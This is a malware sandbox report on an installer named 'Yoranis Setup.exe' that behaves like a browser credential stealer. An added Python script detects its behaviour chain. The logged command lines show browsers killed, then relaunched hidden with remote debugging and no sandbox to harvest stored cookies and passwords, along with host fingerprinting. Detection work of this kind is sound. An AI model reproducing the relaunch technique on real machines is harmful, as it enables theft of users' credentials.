    • cmd.exe (PID: 8232 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8292 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8324 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 8380 cmdline: taskkill /IM Steam.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8412 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 8468 cmdline: taskkill /IM javaw.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8500 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8556 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8588 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8644 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8676 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8732 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8764 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8820 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8852 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 8908 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
No configs have been found
No yara matches

System Summary

Source: Process started; Sigma rule: Browser Started with Remote Debugging; Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000, CommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe", ParentImage: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe, ParentProcessId: 7488, ParentProcessName: YoransSetup.exe, ProcessCommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000, ProcessId: 8092, ProcessName: chrome.exe
Source: Process started; Sigma rule: Usage Of Web Request Commands And Cmdlets; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe", ParentImage: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe, ParentProcessId: 7488, ParentProcessName: YoransSetup.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", ProcessId: 4592, ProcessName: cmd.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, CommandLine: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6464, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, ProcessId: 5652, ProcessName: powershell.exe
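The process tree and the Sigma hits above describe one behaviour chain under YoransSetup.exe (PID 7488): host fingerprinting (curl to api.ipify.org, wmic bios/MemoryChip/VideoController, the ProductName registry read), taskkill /F against fifteen browser image names, and then Chrome and Edge relaunched with --remote-debugging-port=9223, --no-sandbox and an off-screen window position. That relaunch is what the "Attempt to bypass Chrome Application-Bound Encryption" signature refers to: a browser started with DevTools remote debugging decrypts its own cookie and credential stores for any local client that connects to the port, so the stealer never has to touch the ABE-protected key itself. The Python below is an added example, not code from the Joe Sandbox report, showing how to correlate those three patterns per parent process in process-creation telemetry. The event records are constructed from the report's command lines, and the rule names, severities, thresholds and field layout are assumptions made for this example.

```python
"""Correlate the YoransSetup.exe behaviour chain in process-creation telemetry.

Added example, not code from the Joe Sandbox report. EVENTS is constructed
from the report's process tree using the fields a Sysmon Event ID 1 record
carries (ParentProcessId, ParentImage, Image, CommandLine); rule names,
severities and thresholds are assumptions made for this example.
"""
import re
from collections import defaultdict

# Browser image names the sample terminates with taskkill /F (from the report).
BROWSERS = {
    "chrome.exe", "msedge.exe", "brave.exe", "firefox.exe", "opera.exe",
    "kometa.exe", "orbitum.exe", "centbrowser.exe", "7star.exe", "sputnik.exe",
    "vivaldi.exe", "epicprivacybrowser.exe", "uran.exe", "yandex.exe", "iridium.exe",
}

# Match any DevTools remote-debugging switch, not only the default port 9222:
# the sample uses 9223, and --remote-debugging-pipe grants the same capability.
REMOTE_DEBUG_RE = re.compile(r"--remote-debugging-(?:port=(\d+)|pipe)", re.IGNORECASE)
TASKKILL_RE = re.compile(r"taskkill\s+/IM\s+(\S+)\s+/F", re.IGNORECASE)
# Host fingerprinting seen in the tree: external IP, BIOS, RAM, GPU, OS product name.
FINGERPRINT_RE = re.compile(
    r"wmic\s+(?:bios|memorychip|path\s+win32_videocontroller)\b"
    r"|api\.ipify\.org"
    r"|CurrentVersion.*\bProductName\b",
    re.IGNORECASE,
)


def _ev(ppid, parent_image, image, cmdline):
    return {"ppid": ppid, "parent_image": parent_image, "image": image, "cmdline": cmdline}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SETUP = r"C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe"
CMD = r"C:\Windows\system32\cmd.exe /d /s /c "

# Constructed telemetry: PID 7488 is YoransSetup.exe as in the report; the two
# explorer.exe-parented events at the end are benign controls.
EVENTS = [
    _ev(7488, SETUP, "cmd.exe", CMD + '"curl http://api.ipify.org/ --ssl-no-revoke"'),
    _ev(7488, SETUP, "cmd.exe", CMD + '"wmic bios get smbiosbiosversion"'),
    _ev(7488, SETUP, "cmd.exe", CMD + '"wmic MemoryChip get /format:list | find /i "Speed""'),
    _ev(7488, SETUP, "cmd.exe", CMD + '"wmic path win32_VideoController get name"'),
    _ev(7488, SETUP, "cmd.exe", CMD + "\"powershell Get-ItemPropertyValue -Path "
        "'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName\""),
    *[_ev(7488, SETUP, "cmd.exe", CMD + f'"taskkill /IM {b} /F"')
      for b in ("chrome.exe", "msedge.exe", "brave.exe", "firefox.exe", "opera.exe")],
    _ev(7488, SETUP, "chrome.exe",
        '"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 '
        "--profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000"),
    _ev(4242, r"C:\Windows\explorer.exe", "chrome.exe",
        r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'),
    _ev(4242, r"C:\Windows\explorer.exe", "cmd.exe", CMD + '"tasklist"'),
]


def analyze(events, kill_threshold=3, fingerprint_threshold=2):
    """Group events by parent process and return the findings per parent."""
    by_parent = defaultdict(list)
    for e in events:
        by_parent[(e["ppid"], e["parent_image"])].append(e)

    findings = []
    for (ppid, parent_image), evs in by_parent.items():
        parent = _basename(parent_image)
        killed, fingerprint = set(), []
        for e in evs:
            image, cmd = e["image"].lower(), e["cmdline"]
            m = REMOTE_DEBUG_RE.search(cmd)
            # A browser's own helper processes have a browser parent; a browser
            # started with DevTools enabled by anything else is the signal.
            if m and image in BROWSERS and parent not in BROWSERS:
                hidden = "--window-position=-32000" in cmd
                findings.append({"rule": "browser_remote_debugging", "severity": "high",
                                 "ppid": ppid, "parent": parent,
                                 "detail": f"{image} port={m.group(1) or 'pipe'} hidden={hidden}"})
            m = TASKKILL_RE.search(cmd)
            if m and m.group(1).lower() in BROWSERS:
                killed.add(m.group(1).lower())
            if FINGERPRINT_RE.search(cmd):
                fingerprint.append(cmd)
        if len(killed) >= kill_threshold:
            findings.append({"rule": "browser_kill_burst", "severity": "medium",
                             "ppid": ppid, "parent": parent, "detail": sorted(killed)})
        if len(fingerprint) >= fingerprint_threshold:
            findings.append({"rule": "host_fingerprinting", "severity": "low",
                             "ppid": ppid, "parent": parent, "detail": len(fingerprint)})
    return findings


def correlate(findings, min_rules=2):
    """Parent PIDs on which at least min_rules distinct rules fired."""
    rules = defaultdict(set)
    for f in findings:
        rules[f["ppid"]].add(f["rule"])
    return {ppid for ppid, r in rules.items() if len(r) >= min_rules}


if __name__ == "__main__":
    found = analyze(EVENTS)
    for f in found:
        print(f"[{f['severity']}] {f['rule']} parent={f['parent']} (PID {f['ppid']}): {f['detail']}")
    print("correlated parents:", sorted(correlate(found)))
```

The remote-debugging rule on its own also fires on a developer driving Chrome from a test harness, so the per-parent correlation is what raises confidence: on the constructed data all three rules land on PID 7488 and the explorer.exe-parented control events produce nothing. Matching the switch prefix rather than port 9222 is deliberate, since this sample picked 9223; the same grouping key carries over to Sysmon Event ID 1 (ParentProcessId, ParentImage) or Security event 4688 (Creator Process ID).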
No Suricata rule has matched

Source: Yoranis Setup.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Yoranis Setup.exe; Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\b4a0680f-9ee1-57b1-adfd-e68812be32d6
Source: C:\Users\user\Desktop\Yoranis Setup.exe; File created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\Yoranis Setup.exe; File created: C:\Users\user\AppData\Local\Programs\unrealgame\LICENSE.electron.txt
Source: Yoranis Setup.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\projects\src\out\Default\dxcompiler.dll.pdb; source: Yoranis Setup.exe, 00000000.00000003.330047764144.0000000007A01000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Yoranis Setup.exe; File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked
Source: C:\Users\user\Desktop\Yoranis Setup.exe; File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources
Source: C:\Users\user\Desktop\Yoranis Setup.exe; File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules
Source: C:\Users\user\Desktop\Yoranis Setup.exe; File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\build
Source: C:\Users\user\Desktop\Yoranis Setup.exe; File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\locales
Source: C:\Users\user\Desktop\Yoranis Setup.exe; File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js
Source: Joe Sandbox View; IP Address: 9.9.9.9
Source: Joe Sandbox View; IP Address: 104.26.12.205
Source: Joe Sandbox View; IP Address: 143.244.215.221
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1, Host: api.ipify.org, User-Agent: curl/7.55.1, Accept: */*
Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
Source: global traffic; DNS traffic detected: DNS query: api.iwannaeatcats.com
Source: global traffic; DNS traffic detected: DNS query: api.gofile.io
Source: global traffic; DNS traffic detected: DNS query: file.io
Source: global traffic; DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic; DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic; DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic; DNS traffic detected: DNS query: assets.msn.com
Source: global traffic; DNS traffic detected: DNS query: api.msn.com
Source: global traffic; DNS traffic detected: DNS query: c.msn.com
Source: global traffic; DNS traffic detected: DNS query: dns.quad9.net
Source: global traffic; TCP traffic: 192.168.11.20:53645 -> 239.255.255.250:1900
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-fs
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-fs.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/marob)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mikeal/tunnel-agent
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mrvisser)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/msimerson)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mysticatea/eslint-plugin-node/blob/master/docs/rules/no-deprecated-api.md)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nazar-pc)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/node4good/windows-autoconf
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/Release#release-schedule)).
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/TSC/blob/master/Moderation-Policy.md
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/gyp-next
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/gyp-next/archive/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#installation
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#installation)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#on-macos
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#on-windows
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1779
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1861
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1927
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/raw/master/macOS_Catalina_acid_test.sh
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/b3fcc245fb25539909ef1d5eaa01dbf92e168633/lib/path.js#L56
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/c8a04049/lib/internal/errors.js
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/master/CODE_OF_CONDUCT.md
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/8871#issuecomment-250915913
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/string_decoder
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cacache
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cli/blob/4c65cd952bc8627811735bea76b9b110cc4fc80e/lib/utils/ansi-trim.js
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/make-fetch-happen
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/minipass-fetch.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/move-file
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-semver.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/blob/51b6627a1f357d2eb433e7378e5f05e83b7aa6cd/lib/header.js#L349
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/issues/183
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/pull/187
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/nopt.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/npmlog.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/ssri
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ohler/ert
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/oliversalzburg)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pigulla)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ppollono)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rebeccapeltz)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/request/request/blob/b12a6245/lib/redirect.js#L134-L138
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/feross
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/isaacs
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/sindresorhus
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/stingstrom)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tapjs/signal-exit
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tapjs/signal-exit.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tim-kos/node-retry
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/timgates42)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/troygoode/node-require-directory/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-coff
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-machine-type
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-machine-type-descriptor
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-signature
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-signature-offset
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/win-detect-browsers
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/windows-env
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1202
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1869.
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1940.
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/wodka)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/set-blocking#readme
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/set-blocking.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/y18n
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs#supported-nodejs-versions
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs-parser#supported-nodejs-versions
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs-parser.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/zkochan/packages/tree/main/which-pm-runs
